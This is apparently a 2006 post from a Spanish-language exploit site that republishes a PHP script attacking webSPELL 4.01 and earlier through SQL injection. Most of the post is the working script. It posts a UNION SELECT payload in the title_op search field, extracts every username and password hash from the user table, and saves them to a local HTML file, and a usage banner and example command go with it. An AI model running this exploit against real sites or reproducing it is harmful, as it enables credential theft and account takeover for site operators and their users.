webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit
Vi, 17/02/2006 - 10:57 — OeX
<?
function xss_header()
{
echo "ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
echo " oo ooooooo ooooooo\n";
echo " oooo oooo o888 o88 888 o888 888o\n";
echo " 888o888 888 o888 888888888\n";
echo " o88 88o 888 o888 o 888o o888\n";
echo " o88o o88o o888o o8888oooo88 88ooo88\n";
echo "ooooooooooooooooooooo webspell 4.01 sql injection exploit ooooooooooooooooooooo\n";
echo "";
echo "oo usage oooo $ php webspell-401-sql-inject.php [url] [prefix] oooooooooooooooo\n";
echo "oo example oo $ php webspell-401-sql-inject.php http://localhost webs_ oooooooo\n";
echo "oo open the file xss_result.html - there you find the passwords of all users oo\n";
}
function xss_bottom()
{
echo "\noo exploit need curl extension\n";
echo "oo discover : x128 - 13/02/2006\n";
echo "oo contact : x00128@freenet.de oo website : people.freenet.de/x128";
}
function xss_exploit()
{
$xss_target = $_SERVER['argv'][1] . "/index.php?site=search&action=search";
$xss_http_post = "table=news&title1=9a39b0c5e6849658e30d1432a308103d&title_op=UNION SELECT 1, 1, 1, 1, username, `password`, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM ". $_SERVER['argv'][2] ."user/*";
$xss_connection = curl_init();
curl_setopt ($xss_connection, CURLOPT_URL, $xss_target);
curl_setopt ($xss_connection, CURLOPT_HEADER, 0);
curl_setopt ($xss_connection, CURLOPT_POST, 1);
curl_setopt ($xss_connection, CURLOPT_POSTFIELDS, $xss_http_post);
curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128');
$xss_source = curl_exec($xss_connection) or die("oo error!\n");
$xss_output = fopen("xss_result.html","w");
fputs($xss_output, $xss_source);
fclose($xss_output);
curl_close ($xss_connection);
}
xss_header();
xss_exploit();
xss_bottom();
?>- 862 lecturas
Comentarios
Enviar un comentario nuevo